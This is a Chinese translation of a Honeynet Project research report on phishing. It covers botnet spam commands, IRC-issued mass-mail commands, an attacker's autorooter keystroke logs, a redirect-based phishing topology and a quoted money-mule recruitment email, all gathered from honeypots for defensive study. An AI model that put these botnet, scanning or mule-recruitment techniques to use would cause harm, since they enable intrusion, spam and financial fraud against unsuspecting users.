蜜網(wǎng)項(xiàng)目組最近發(fā)布的一篇文章“ 了解你的敵人:跟蹤 僵尸網(wǎng)絡(luò) ”介紹了一種追蹤僵尸網(wǎng)絡(luò)的方法。一個(gè)僵尸網(wǎng)絡(luò)是由可被攻擊者遠(yuǎn)程控制的被攻陷主機(jī)所構(gòu)成的網(wǎng)絡(luò)。由于他們的巨大數(shù)量(可以有成千上萬(wàn)的主機(jī)一起連接),當(dāng)僵尸網(wǎng)絡(luò)被用以分布式拒絕服務(wù)攻擊時(shí),可以對(duì)互聯(lián)網(wǎng)社區(qū)構(gòu)成巨大的威脅。在 2004 年 10 月的一次調(diào)查中,電子郵件安全公司 CipherTrust 得出了 70% 監(jiān)視到的釣魚垃圾郵件是從 5 個(gè)活躍的僵尸網(wǎng)絡(luò)中的 1 個(gè)所發(fā)出的,但是我們的觀察顯示有更多的僵尸網(wǎng)絡(luò)已經(jīng)被用來(lái)進(jìn)行發(fā)送垃圾郵件。盡管還沒有一個(gè)顯著的實(shí)際案例分析,在本節(jié)中我們還是給出了我們對(duì)可被攻擊者以僵尸網(wǎng)絡(luò)的方式進(jìn)行網(wǎng)絡(luò)釣魚攻擊的工具和技術(shù)的觀察結(jié)果。
案例時(shí)間表
在從 2004 年 9 月到 2005 年 1 月的這段時(shí)期中,德國(guó)蜜網(wǎng)項(xiàng)目組部署了一系列安裝未打補(bǔ)丁的微軟 Windows 操作系統(tǒng)的蜜罐,以觀察僵尸網(wǎng)絡(luò)活動(dòng)。我們開發(fā)了一個(gè)自動(dòng)化部署的過(guò)程,使得蜜罐可以被重復(fù)性地部署,攻陷及離線分析。在此期間,超過(guò) 100 個(gè)不同的僵尸網(wǎng)絡(luò)被發(fā)現(xiàn),以及上千的文件被獲取用以離線分析。
分析
一些在此研究項(xiàng)目中捕獲的僵尸工具提供了在被攻陷主機(jī)上遠(yuǎn)程啟動(dòng)一個(gè) SOCKS v4/v5 代理的能力。 SOCKS 為基于 TCP /IP 的網(wǎng)絡(luò)應(yīng)用程序提供了一種通用化的代理機(jī)制( RFC 1928 ),可以被用來(lái)代理最普遍的互聯(lián)網(wǎng)流量,如 HTTP 和 SMTP 等。如果攻擊者能夠成功地通過(guò)僵尸網(wǎng)絡(luò)的控制使得各個(gè)遠(yuǎn)程傀儡主機(jī)上都開放 SOCKS 代理服務(wù)功能,那么該主機(jī)可以被用來(lái)發(fā)送大量的垃圾郵件,如果僵尸網(wǎng)絡(luò)中包含成千上萬(wàn)的傀儡主機(jī),那么攻擊者可以輕易地發(fā)送巨大數(shù)量的垃圾郵件,而這些垃圾郵件的發(fā)送源頭卻是覆蓋巨大 IP 地址范圍的屬于一些無(wú)戒備心用戶的家庭 PC 機(jī)。
不存在集中的控制點(diǎn),以及其范圍超出了國(guó)界使得很難對(duì)僵尸網(wǎng)絡(luò)的活動(dòng)進(jìn)行追蹤和阻斷。這也使得僵尸網(wǎng)絡(luò)為垃圾郵件發(fā)布者和釣魚者提供了一種低風(fēng)險(xiǎn)的、但高回報(bào)的攻擊方法。或許不會(huì)令人驚訝,富有傀儡資源的僵尸網(wǎng)絡(luò)擁有者已經(jīng)開始以犯罪為目標(biāo),并且目前也已經(jīng)出現(xiàn) 租借 僵尸網(wǎng)絡(luò)的現(xiàn)象。為了賺取租金,僵尸網(wǎng)絡(luò)的操作者將會(huì)給他的客戶提供一個(gè)支持 SOCKS v4 的服務(wù)器 IP 地址和端口。已經(jīng)有報(bào)道顯示僵尸網(wǎng)絡(luò)被出售給垃圾郵件發(fā)布者作為垃圾郵件的轉(zhuǎn)發(fā)服務(wù)器。 " Uncovered: Trojans as Spam Robots ". 一些捕獲的僵尸工具也實(shí)現(xiàn)了能夠獲取 Email 地址,或者通過(guò)傀儡主機(jī)發(fā)送垃圾郵件的特殊功能。下面的列表顯示了一些在 Agobot (一個(gè)被攻擊者非常普遍使用的僵尸工具,其變種也經(jīng)常在我們的研究過(guò)程中被捕獲)中實(shí)現(xiàn)的與垃圾郵件 / 釣魚郵件相關(guān)的指令:
harvest.emails – 使得僵尸工具獲得一個(gè) Email 地址列表
harvest.emailshttp – 使得僵尸工具通過(guò) HTTP 獲得一個(gè) Email 地址列表
spam .setlist – 下載一個(gè) Email 地址列表
spam .settemplate – 下載一個(gè) Email 模板
spam .start – 開始發(fā)送垃圾郵件
spam .stop – 停止發(fā)送垃圾郵件
aol spam .setlist - AOL - 下載一個(gè) Email 地址列表
aolspam.settemplate - AOL - 下載一個(gè) Email 模板
aol spam .setuser - AOL – 設(shè)置用戶名
aol spam .setpass - AOL -設(shè)置口令
aol spam .start - "AOL - 開始發(fā)送垃圾郵件
aol spam .stop - "AOL - 停止發(fā)送垃圾郵件
關(guān)于這些指令實(shí)現(xiàn)的進(jìn)一步信息,可以在這找到,以僵尸工具源碼的注釋形式給出。在 drone -一個(gè)由德國(guó)蜜網(wǎng)項(xiàng)目組開發(fā)的自定制 IRC 客戶端的幫助下,通過(guò)利用我們的蜜網(wǎng)所捕獲的網(wǎng)絡(luò)連接數(shù)據(jù)將 drone 混入僵尸網(wǎng)絡(luò)中,我們可以對(duì)僵尸網(wǎng)絡(luò)如何被用以進(jìn)行發(fā)送垃圾郵件 / 釣魚郵件進(jìn)行更深入的了解。以下將給出一些觀察到的典型活動(dòng)案例。
實(shí)例 1
在一個(gè)特定的僵尸網(wǎng)絡(luò)中,我們觀察到攻擊者發(fā)出了以下指令(注意 URL 都已經(jīng)被混淆了):
<St0n3y> .mm http://www.example.com/email/fetch.php? 4a 005aec5d7dbe3b 01c 75aab2b 1c 9991 http://www.foobar.net/pay.html Joe did_u_send_me_this
.mm (mass emailing) 指令是一個(gè)一般化的 spam_start 指令的定制版本。這個(gè)指令接收以下 4 個(gè)參數(shù):
一個(gè)包含多個(gè) Email 地址文件的 URL
包含在垃圾郵件中的目標(biāo)網(wǎng)站地址鏈接-這個(gè)網(wǎng)站可能是一個(gè)普遍的垃圾網(wǎng)頁(yè),也可能是一個(gè)釣魚網(wǎng)站
發(fā)送者的名字
郵件的主題
在本次攻擊案例中,每次調(diào)用 fetch.php 腳本會(huì)返回 30 個(gè)不同的 Email 地址。對(duì)于每個(gè)收信者,將會(huì)構(gòu)造一個(gè) Email 郵件,將宣傳指令中第二個(gè)參數(shù)給出的鏈接。在這個(gè)實(shí)例中,第二個(gè)參數(shù)的鏈接指向了一個(gè)企圖在受害者主機(jī)上安裝一個(gè)惡意 ActiveX 組件的網(wǎng)頁(yè)。
實(shí)例 2
在另一個(gè)僵尸網(wǎng)絡(luò)中,我們觀察到在受害者 PC 上安裝瀏覽器助手組件的攻擊方式:
[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s
.open 指令告訴每個(gè)僵尸工具打開所申請(qǐng)的網(wǎng)頁(yè)并顯示給受害者,在這個(gè)案例中,這個(gè)網(wǎng)頁(yè)中包含一個(gè)瀏覽器助手組件,企圖在受害者主機(jī)上安裝自身。從這個(gè) IRC 頻道的名稱可以顯示出,這個(gè)僵尸網(wǎng)絡(luò)也是用以發(fā)送垃圾郵件的。
實(shí)例 3
在另外一個(gè)僵尸網(wǎng)絡(luò)上,我們觀察到 spyware 傳播的實(shí)例:
http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...]
這個(gè)鏈接在對(duì)捕獲到的惡意軟件的分析中獲得,它將受害者指向了一個(gè)提供“免費(fèi)的廣告?zhèn)鞑ボ浖?rdquo;的公司的網(wǎng)頁(yè),這個(gè)網(wǎng)站包含了在企圖訪問(wèn)客戶端上安裝 ActiveX 組件(推測(cè)是 adware 或 spyware )的多個(gè)頁(yè)面。 #p#副標(biāo)題#e#
普遍的攻擊旋律
在我們對(duì)網(wǎng)絡(luò)釣魚攻擊的研究過(guò)程中發(fā)現(xiàn)了一些普遍的攻擊旋律,攻擊者顯然在混合使用一些工具和技術(shù)來(lái)提高他們成功的機(jī)會(huì)。我們現(xiàn)在開始分析兩種這樣的技術(shù)-批量掃描和組合式攻擊。
批量掃描
通過(guò)對(duì)一些被攻陷蜜罐的分析表明,系統(tǒng)是自動(dòng)化的攻擊腳本所攻陷,這些自動(dòng)化攻擊腳本通常被稱為 autorooters 。在上面描述的兩個(gè)案例中,一旦攻擊者攻陷了蜜罐, autorooter 的 toolkits 就被上傳到服務(wù)器上,然后攻擊者就開始嘗試掃描一些 IP 地址空間段來(lái)尋找其他同樣存在漏洞的服務(wù)器(在德國(guó)案例中使用的稱為 superwu 的掃描器,而在英國(guó)案例中使用了 mole 掃描器)。在英國(guó)案例中捕獲的攻擊者鍵擊記錄如下所示,顯示了從被攻陷的蜜罐發(fā)起的批量掃描的實(shí)例。注意由于蜜網(wǎng)配置,這些往外的惡意流量會(huì)被阻斷,從而這些攻擊不會(huì)成功。
攻擊者解壓縮掃描器,并嘗試掃描 B 類地址空間段:
[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz
[2004-07-18 15:23:33 bash 0]cd mole
[2004-07-18 15:23:38 bash 0]./mazz 63.2
[2004-07-18 15:24:04 bash 0]./mazz 207.55
[2004-07-18 15:25:13 bash 0]./scan 80.82
擊者嘗試攻擊潛在的有漏洞的服務(wù)器:
[2004-07-19 11:56:46 bash 0]cd mole
[2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net
[2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNNs
攻擊者在一段時(shí)間后回來(lái)查看已經(jīng)成功攻陷的服務(wù)器列表(這個(gè)列表是空的,由于蜜網(wǎng)的配置):
[2004-07-23 08:13:18 bash 0]cd mole
[2004-07-23 08:13:20 bash 0]ls
[2004-07-23 08:13:25 bash 0]cat hacked.servers
攻擊者嘗試掃描更多的 B 類地址空間段,并隨后測(cè)試對(duì)選擇目標(biāo)進(jìn)行攻擊:
[2004-07-24 10:24:17 bash 0]cd mole
[2004-07-24 10:24:19 bash 0]./scan 140.130
[2004-07-24 10:24:27 bash 0]./scan 166.80
[2004-07-24 10:25:36 bash 0]./scan 166.4
[2004-07-24 10:26:23 bash 0]./scan 139.93
[2004-07-24 10:27:18 bash 0]./scan 133.200
[2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX
[2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY
[2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY
在上述最后一個(gè)例子中,注意攻擊者嘗試攻陷的幾個(gè)主機(jī)并不在從這個(gè)蜜罐掃描的 IP 地址范圍內(nèi),這又一次提供了批量掃描行為的高協(xié)同性和并行性。
對(duì)英國(guó)攻擊者下載的 mole .tgz 文件的進(jìn)一步調(diào)查揭示了在解壓后的 aotorooter toolkit 的根目錄中有一些 text 文件。這些文件包括掃描配置信息和之前掃描“ grabbb2.x and samba 2.2.8 vulnerability ”的掃描結(jié)果日志。在這些文件中還包含 42 個(gè)針對(duì)其他主機(jī)的攻擊案例,以及針對(duì)多個(gè) B 類地址空間掃描的結(jié)果,從而證明了觀察到的攻擊案例是一個(gè)更大的更具組織性的針對(duì)類似系統(tǒng)的攻擊中的一部分。一個(gè)從攻擊者的角度查看的 mole 掃描工具的輸出結(jié)果的實(shí)例,可以在 這 找到。
最后,一些從攻陷蜜罐上發(fā)現(xiàn)的批量掃描工具看起來(lái)并沒有廣泛地傳播,這也顯示了這些攻擊者擁有超越基本的腳本小子的一定水平的開發(fā)能力和工具制造能力,或者是一個(gè)并沒有將他們的工具共享給公開論壇的封閉社團(tuán)的成員。又一次,這顯示了具有良好組織性的攻擊者的能力。
組合式攻擊
在我們的研究中,我們也發(fā)現(xiàn)了釣魚者經(jīng)常組合三種不同的攻擊技術(shù)。正如我們觀察到,并在本文所描述的,一些時(shí)候多種方法將提供一些冗余性,并通過(guò)一個(gè)兩層的網(wǎng)絡(luò)拓?fù)渑渲帽Wo(hù)他們的網(wǎng)絡(luò)釣魚攻擊基礎(chǔ)設(shè)置。下圖描述了一種可能的網(wǎng)絡(luò)釣魚攻擊拓?fù)浣Y(jié)構(gòu):
在這個(gè)實(shí)例中,一個(gè)中央的網(wǎng)站服務(wù)器架設(shè)了物理上的釣魚網(wǎng)站內(nèi)容,通常包含針對(duì)多個(gè)目標(biāo)機(jī)構(gòu)的多個(gè)網(wǎng)站(如在 /ebay 目錄下有 一個(gè) eBay 釣魚網(wǎng)站,在 .paypal 目錄下有一個(gè) PayPal 釣魚網(wǎng)站 )。一些被攻陷的遠(yuǎn)程主機(jī)在 redir 端口重定向器的幫助下將連入 TCP 80 端口的 HTTP 流量重定向到中央的網(wǎng)站服務(wù)器。這種方案從攻擊者的角度看來(lái)比一個(gè)單一的釣魚網(wǎng)站擁有以下的一些優(yōu)勢(shì):
如果一臺(tái)遠(yuǎn)程的 redir 主機(jī)被檢測(cè)到了,那么受害者將把這個(gè)系統(tǒng)離線并重新安裝,但這并不會(huì)對(duì)釣魚者構(gòu)成很大的損失,因?yàn)橹麽烎~網(wǎng)站仍然在線,而且其他的 redir 主機(jī)仍然可以將 HTTP 流量轉(zhuǎn)發(fā)到中央網(wǎng)站服務(wù)器。
如果中央的釣魚網(wǎng)站服務(wù)器被檢測(cè)到,這個(gè)系統(tǒng)將被離線,但釣魚者可以在一臺(tái)新攻陷的主機(jī)上重新架設(shè)釣魚網(wǎng)站,并重新矯正原先的 redir 主機(jī)重定向流量到代替的中央網(wǎng)站服務(wù)器。使用這種技術(shù),整個(gè)網(wǎng)絡(luò)可以很快地重新恢復(fù)可用,網(wǎng)絡(luò)釣魚攻擊可以快速地重新開始。
一臺(tái) redir 主機(jī)可以非常靈活,因?yàn)樗梢酝ㄟ^(guò)非常簡(jiǎn)單地重新配置指向另外一個(gè)釣魚網(wǎng)站。這也減少了從初始的系統(tǒng)攻陷到釣魚網(wǎng)站可用的這段時(shí)間,從而增加了網(wǎng)絡(luò)釣魚攻擊可以進(jìn)行的時(shí)間長(zhǎng)度。
使用這樣的組合攻擊技術(shù)又一次驗(yàn)證了攻擊者的高組織性和能力,而不僅僅是簡(jiǎn)單的腳本小子。類似的運(yùn)行模型也經(jīng)常被主流的網(wǎng)站服務(wù)提供商和超大容量數(shù)據(jù)內(nèi)容提供商(如 Google )所運(yùn)用。
進(jìn)一步的發(fā)現(xiàn):資金轉(zhuǎn)賬
我們的研究同時(shí)也關(guān)注釣魚者如何使用捕獲的銀行賬號(hào)信息(如一個(gè)與相關(guān)的交易代號(hào)聯(lián)系在一起的銀行賬號(hào))。因?yàn)榇蠖鄶?shù)銀行都對(duì)跨國(guó)的資金流通進(jìn)行監(jiān)控,釣魚者并不能簡(jiǎn)單地不引起金融權(quán)威機(jī)構(gòu)注意下,從一個(gè)國(guó)家轉(zhuǎn)移一大筆資金到另外一個(gè)國(guó)家。釣魚者于是使用一些中介來(lái)為他們轉(zhuǎn)移資金-以兩階段的步驟,釣魚者先從受害者銀行賬號(hào)中把錢轉(zhuǎn)移到一個(gè)同國(guó)中介人的銀行賬號(hào)中,中介人然后從他們的銀行賬號(hào)中提出現(xiàn)金(留下一定百分比作為他們的提供此轉(zhuǎn)賬服務(wù)的報(bào)酬)并寄給釣魚者,如通過(guò)普通的地面信件。當(dāng)然,這些中介人可能被捕,但是由于釣魚者的錢已經(jīng)在傳輸途中,他們并不會(huì)面對(duì)太大的安全風(fēng)險(xiǎn),同時(shí)也可以很容易地轉(zhuǎn)移他們的資金流通渠道到另外的中介人。一個(gè)可以說(shuō)明在網(wǎng)絡(luò)釣魚攻擊背后的金融結(jié)構(gòu)的電子郵件實(shí)例如下:
Hello!
We finding Europe persons, who can Send/Receive bank wires
from our sellings, from our European clients. To not pay
TAXES from international transfers in Russia . We offer 10%
percent from amount u receive and pay all fees, for sending
funds back.Amount from 1000 euro per day. All this activity
are legal in Europe .
Fill this form: http://XXX.info/index.php (before filling
install yahoo! messenger please or msn), you will recieve
full details very quickly.
_________________________________________________________
Wir, europ?ische Personen findend, die Bankleitungen
davon Senden/erhalten k?nnen unsere Verk?ufe, von
unseren Kunden von Deutschland. STEUERN von internationalen
übertragungen in Russland nicht zu bezahlen. Wir
erh?lt das Prozent des Angebots 10 % vom Betrag und
bezahlt alle Schulgelder, um Kapital zurück zu senden.
Betrag von 1000 Euro pro Tag. Diese ganze T?tigkeit
ist in Europa gesetzlich.
Füllen Sie diese Form: http://XXX.info/index.php (bevor
die Füllung Yahoo installiert! Bote bitte oder msn), Sie
recieve volle Details sehr.
Thank you, FINANCIE LTD.
這是一封從英文到德文的非常爛的翻譯稿,可能是通過(guò)翻譯軟件自動(dòng)產(chǎn)生的,這也說(shuō)明攻擊者并不是以英語(yǔ)為母語(yǔ)的。因?yàn)殄X將會(huì)被轉(zhuǎn)移到俄羅斯,所以攻擊者很可能來(lái)自這個(gè)國(guó)家。資金轉(zhuǎn)移行為也正隨著網(wǎng)絡(luò)釣魚攻擊越來(lái)越具組織性變得越來(lái)越普遍。 #p#副標(biāo)題#e#
Honeysnap – 一個(gè)攻擊案例分析助手
一個(gè)從我們開始分析被上述網(wǎng)絡(luò)釣魚攻擊攻陷的蜜罐數(shù)據(jù)時(shí)立即得到的一個(gè)結(jié)論是:由于不同黑客組織同時(shí)進(jìn)行的多個(gè)攻擊,我們需要非常多的時(shí)間從網(wǎng)絡(luò)的流量中去抽取和準(zhǔn)備用于進(jìn)一步詳細(xì)分析的數(shù)據(jù)。這個(gè)數(shù)據(jù)抽取過(guò)程是重復(fù)性的且枯燥乏味的,如果由人工進(jìn)行將會(huì)使得我們寶貴的分析時(shí)間的效率大打折扣。因此需要一個(gè)自動(dòng)化的解決方案。
由英國(guó)蜜罐項(xiàng)目組 David Watson 編寫的 honeysnap 腳本正是基于此目的,被設(shè)計(jì)用來(lái)對(duì)蜜網(wǎng)日常捕獲的數(shù)據(jù)為輸入產(chǎn)生出一個(gè)簡(jiǎn)單的摘要輸出,用于指導(dǎo)進(jìn)一步的人工分析。 honeysnap 腳本對(duì)每個(gè)蜜罐的數(shù)據(jù)進(jìn)行分類,提供了連出的 HTTP 和 FTP GETs 請(qǐng)求、 IRC 消息和 Sebek 鍵擊記錄日志列表功能,對(duì)關(guān)鍵網(wǎng)絡(luò)連接能夠進(jìn)行自動(dòng)化的 TCP 流重組,并抽取、標(biāo)識(shí)和存儲(chǔ)由 FTP 或 HTTP 下載的文件, honeysnap 腳本使得大多數(shù)消耗大量時(shí)間的攻擊案例準(zhǔn)備性工作都被移除,使得分析員能夠集中精力人工地分析案例中的關(guān)鍵部分。 honeysnap 腳本還支持一個(gè)自動(dòng)化的方法對(duì)包含感興趣的關(guān)鍵字(如銀行、賬號(hào)、口令等)的 IRC 通訊進(jìn)行顯示,并提供日常性的 Email 報(bào)告功能。
目前的 honeysnap 腳本的一個(gè)基本的概念證明性的 UNIX shell 腳本,其 alpha 版可以在此找到,同時(shí)一組 honeysnap 輸出 示例可以在此找到。一個(gè)模塊化的并完全擴(kuò)展的以 Python 編寫的版本目前正在由蜜網(wǎng)項(xiàng)目組的成員開發(fā)中,并將與 2005 年 6 月發(fā)布 beta 測(cè)試版。
進(jìn)一步的研究
在本文給出的信息給出了在網(wǎng)絡(luò)釣魚攻擊領(lǐng)域進(jìn)行進(jìn)一步研究的一些潛在方法,我們同時(shí)建議在以下的一些方面進(jìn)行更深入的調(diào)查和研究:
我們希望能夠調(diào)查蜜罐技術(shù)能否被用于幫助與垃圾郵件發(fā)送者和釣魚者進(jìn)行對(duì)抗。一個(gè)可能的研究項(xiàng)目是部署一些在上述觀察到的網(wǎng)絡(luò)釣魚攻擊中所通常使用類型的蜜罐,或是一些對(duì)垃圾郵件發(fā)送者具有很強(qiáng)的吸引力的蜜罐( 如 SMTP open relays ),對(duì)攻擊者對(duì)這些系統(tǒng)的攻擊行為進(jìn)行進(jìn)一步的分析,能夠幫助我們更深入地對(duì)網(wǎng)絡(luò)釣魚攻擊進(jìn)行剖析,特別是使用僵尸網(wǎng)絡(luò)進(jìn)行網(wǎng)絡(luò)釣魚這一領(lǐng)域,并能夠?qū)W(wǎng)絡(luò)釣魚攻擊的創(chuàng)新進(jìn)行跟蹤。另外一個(gè)研究的可能性是進(jìn)一步發(fā)展蜜罐的概念,研究客戶端蜜罐技術(shù),這種新一代的蜜罐工具能更活躍地參與到通訊網(wǎng)絡(luò)中,例如,自動(dòng)地隨著垃圾郵件中的鏈接去訪問(wèn)目標(biāo)網(wǎng)站內(nèi)容。客戶端蜜罐工具可以在 IRC 頻道中發(fā)呆或通過(guò) P2P 網(wǎng)絡(luò)共享 / 下載文件,從而進(jìn)一步地提高我們對(duì)這些通訊網(wǎng)絡(luò)中所面臨地安全威脅的了解。
另外,我們期望能夠?qū)?duì)付和阻止這些網(wǎng)絡(luò)釣魚攻擊的潛在方法進(jìn)行深入研究。因?yàn)閺囊粋€(gè)網(wǎng)絡(luò)釣魚攻擊的開始到結(jié)束的時(shí)間周期可能只有幾個(gè)小時(shí)或幾天,同時(shí)攻擊源也可能廣泛地分布,所以這將是一個(gè)困難的任務(wù)。目前在此領(lǐng)域研究的工作(如 The AntiPhishing Group 和 PhishReport )關(guān)注于依靠終端用戶收集釣魚郵件。雖然這是個(gè)可行的途徑,但它只能在網(wǎng)絡(luò)釣魚攻擊生命周期的最后階段進(jìn)行發(fā)現(xiàn)。 我們更需要一個(gè)自動(dòng)化地對(duì)網(wǎng)絡(luò)釣魚攻擊捕獲和響應(yīng)的機(jī)制。
我們懷疑這些賬號(hào)和口令在黑客界會(huì)被進(jìn)行交易流通,可能通過(guò) IRC 。蜜網(wǎng)技術(shù)可以被用來(lái)捕獲這些通訊,并更深入地了解網(wǎng)絡(luò)釣魚攻擊行為。另外,網(wǎng)絡(luò)釣魚攻擊工具經(jīng)常可以從一些經(jīng)常更新地中央網(wǎng)站服務(wù)器或 FTP 服務(wù)器上下載獲得。盡管充滿爭(zhēng)議,但對(duì)這些活動(dòng)可以進(jìn)行監(jiān)控或聯(lián)系系統(tǒng)擁有者以幫助他阻止這些網(wǎng)絡(luò)釣魚攻擊,同時(shí)我們應(yīng)該建立一個(gè)體系框架,從而對(duì)這些活動(dòng)進(jìn)行研究,并提出潛在的對(duì)策。
需要在提高案例分析的自動(dòng)化進(jìn)行進(jìn)一步的研究工作,特別是對(duì)在這些攻擊過(guò)程中捕獲數(shù)據(jù)的自動(dòng)輪廓生成。自動(dòng)的流量和 IP 地址抽取, DNS 反向查詢和 IP 地址塊擁有者查詢,針對(duì)每個(gè) IP 地址或每個(gè)域名的流量摘要,以及被動(dòng)的操作系統(tǒng)指紋辨識(shí)等功能在分析大規(guī)模的數(shù)據(jù)集時(shí)是非常有用的,在分析一個(gè)本地的包括已知主機(jī)、攻擊者、攻擊特征、消息內(nèi)容等的取證數(shù)據(jù)庫(kù)也是同樣關(guān)鍵。在一個(gè)長(zhǎng)期的規(guī)劃中,需要建立共享這些信息的統(tǒng)一標(biāo)準(zhǔn),以及一個(gè)全球的取證分析數(shù)據(jù)庫(kù)從而支持對(duì)分布式的黑客活動(dòng)進(jìn)行分析,這也將是對(duì)整個(gè)互聯(lián)網(wǎng)社區(qū)所高度需要和有顯著意義的。
結(jié)論
本文中我們展示了一些真實(shí)世界發(fā)生的網(wǎng)絡(luò)釣魚攻擊的實(shí)際案例,以及在這些案例中攻擊者進(jìn)行的典型的行為。所有這些提供的信息都是使用高交互性的研究型蜜罐所捕獲的,這又一次證明了蜜網(wǎng)技術(shù)在信息保障和取證分析領(lǐng)域里是一個(gè)強(qiáng)有力的工具。我們分析了攻擊由德國(guó)和英國(guó)蜜網(wǎng)研究項(xiàng)目組部署的蜜罐的幾次攻擊。在兩個(gè)案例中,釣魚者攻擊并攻陷了蜜罐系統(tǒng),在攻陷主機(jī)后他們的動(dòng)作開始有所差異。如下的網(wǎng)絡(luò)釣魚攻擊各階段的攻擊技術(shù)被發(fā)現(xiàn):
以著名的一些組織結(jié)構(gòu)為目標(biāo),架設(shè)其釣魚網(wǎng)站
發(fā)送欺騙性垃圾郵件,引誘受害者訪問(wèn)釣魚網(wǎng)站
安裝重定向服務(wù),將網(wǎng)站流量都轉(zhuǎn)發(fā)到已架設(shè)的釣魚網(wǎng)站
通過(guò)僵尸網(wǎng)絡(luò)傳播垃圾郵件和釣魚郵件
這些數(shù)據(jù)幫助我們了解釣魚者的典型攻擊行為和他們用來(lái)引誘和欺騙受害者的一些方法。我們已經(jīng)學(xué)習(xí)到網(wǎng)絡(luò)釣魚攻擊可以非常快地發(fā)生,在最初的系統(tǒng)入侵到一個(gè)釣魚網(wǎng)站在線,并發(fā)出宣揚(yáng)此網(wǎng)站的釣魚垃圾郵件只有相當(dāng)有限的時(shí)間,而這么快的攻擊速度使得這些攻擊者很難被追蹤和阻止。
我們的研究同時(shí)顯示網(wǎng)絡(luò)釣魚攻擊正在變得越來(lái)越普遍而且具有良好的組織性。我們已經(jīng)觀察到針對(duì)主要的幾個(gè)在線組織機(jī)構(gòu)的預(yù)先構(gòu)建的釣魚網(wǎng)站的歸檔,這使得釣魚者可以在很短的時(shí)間內(nèi)準(zhǔn)備好進(jìn)行釣魚攻擊,這也說(shuō)明了背后隱藏著一個(gè)組織良好的釣魚攻擊團(tuán)體。這些釣魚內(nèi)容可以通過(guò)利用端口重定向器或僵尸網(wǎng)絡(luò)快速地進(jìn)一步擴(kuò)散。與批量掃描的證據(jù)和釣魚網(wǎng)站內(nèi)容中手動(dòng)形式加入的 IP 地址,我們可以相信在一個(gè)時(shí)刻會(huì)有多個(gè)特定釣魚網(wǎng)站的實(shí)例同時(shí)存在,在上傳的釣魚網(wǎng)站構(gòu)建完成之前,到達(dá)這個(gè)剛被攻陷的服務(wù)器的網(wǎng)頁(yè)瀏覽流量就已經(jīng)被發(fā)現(xiàn),而且在某個(gè)被攻陷主機(jī)上發(fā)出的釣魚垃圾郵件也有可能并不是在引誘受害者訪問(wèn)發(fā)送郵件的這臺(tái)主機(jī),這些現(xiàn)象都說(shuō)明有良好組織性的釣魚團(tuán)隊(duì)在進(jìn)行分布式和并行的釣魚攻擊。
我們的研究工作顯示了垃圾郵件、僵尸網(wǎng)絡(luò)和網(wǎng)絡(luò)釣魚攻擊之間一個(gè)清晰的連接關(guān)系,以及利用中介來(lái)完成最后的隱蔽性資金轉(zhuǎn)賬。這些觀察到的現(xiàn)象,結(jié)合大規(guī)模的批量漏洞掃描和兩層拓?fù)浣Y(jié)構(gòu)的釣魚網(wǎng)絡(luò),都證明了釣魚者所帶來(lái)的真實(shí)威脅,釣魚活動(dòng)的組織嚴(yán)密性,以及他們所使用的相當(dāng)高級(jí)的攻擊技術(shù)。隨著釣魚攻擊的技術(shù)門檻進(jìn)一步增高及潛在的回報(bào)進(jìn)一步增加,在未來(lái)幾年中,網(wǎng)絡(luò)釣魚攻擊的技術(shù)很可能進(jìn)一步地發(fā)展,并且網(wǎng)絡(luò)釣魚攻擊的數(shù)量也將進(jìn)一步增長(zhǎng)。減少可被僵尸網(wǎng)絡(luò)控制的有漏洞的 PC 機(jī),抑制數(shù)量不斷增多的垃圾郵件,防止有組織性的犯罪活動(dòng),并且教育互聯(lián)網(wǎng)用戶關(guān)注來(lái)自社交工程的潛在安全風(fēng)險(xiǎn),所有這些都還充滿了挑戰(zhàn)。 #p#副標(biāo)題#e#
